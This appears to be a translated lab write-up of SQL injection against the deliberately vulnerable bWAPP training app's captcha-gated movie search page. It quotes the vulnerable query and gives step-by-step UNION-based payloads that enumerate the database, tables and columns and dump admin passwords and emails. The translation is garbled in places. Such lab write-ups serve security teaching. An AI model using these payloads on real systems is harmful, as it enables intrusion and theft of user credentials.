The Bwapp of SQL injection manual_interv.php

1, enter the verification code, many think also useless.


Then jump to


Familiar with the injection page. Guess the role of verification code should be a login to verify the role, see "manual_interv.php", the code is as follows:

if(isset($_POST["form"]) && isset($_SESSION["captcha"])){    if($_POST["captcha_user"] == $_SESSION["captcha"])    {        $_SESSION["manual_interv"] = 1;        header("Location: sqli_9.php");        exit;    }    else    {        $message = "<font color=\"red\">Incorrect CAPTCHA!</font>";    }}

Judge the verification code and jump to "sqli_9.php".
Here's the code for the search-sql:
$sql = "SELECT * FROM movies WHERE title LIKE ‘%" . sqli($title) . "%‘";
Forgot to say before, search-type injection why input "1% ' and '% ' = '" will be normal without error, because "1%" here the percent and single quotation mark (% '), closed the code "like '%", two "and"% ' = ' "here ('% ' = ') is to close the code at the back of the"% ‘";” and injected into it becomes the "select * from movies WHERE the title like '%" 1% ' and '% ' = ' "% '", meaning to search for "1", followed by "% ' = '% '" became a true judgment. Enter "1% ' query statement +--+", is to close the previous search query, and call our injected query statement, and then comment out the later content.
Next, let's talk about SQL injection.
2, enter a single quotation mark to judge.

Error and "%", decisive attempt to search-type injection. Enter "title=1% ' and '% ' = '", result

3, Judge the number of fields:
Enter "title=1% ' ORDER by 7--+" Normal, enter "title=1% ' ORDER by 8--+" error, result


So the number of fields is 7.
4. View the display bit:
Enter "title=1% ' union select 1,2,3,4,5,6,7--+", result

5, query database and other information:
Enter "title=1%" union Select 1,database (), version (), 4,user (), 6,7--+ ", query database named Bwapp, database version is 5.5.53, current user is [email protected] Results

6. Query Table name:
Enter "title=1%" union Select 1,database (), version (), Table_name,user (), 6,7 from Information_schema.tables where Table_ Schema= ' Bwapp '--+ ', found the users table more important, results:

7. Query Field Name:
Enter "title=1%" union Select 1,database (), version (), Column_name,user (), 6,7 from Information_schema.columns where Table_ Name= ' users '--+, found the more important fields are admin, password, email, results

8, query the contents of the field:
Enter "title=1%" union Select 1,database (), version (), Group_concat (admin, "| |", password, "| |", email), User (), 6,7 from users --+ ", Results

The Bwapp of SQL injection manual_interv.php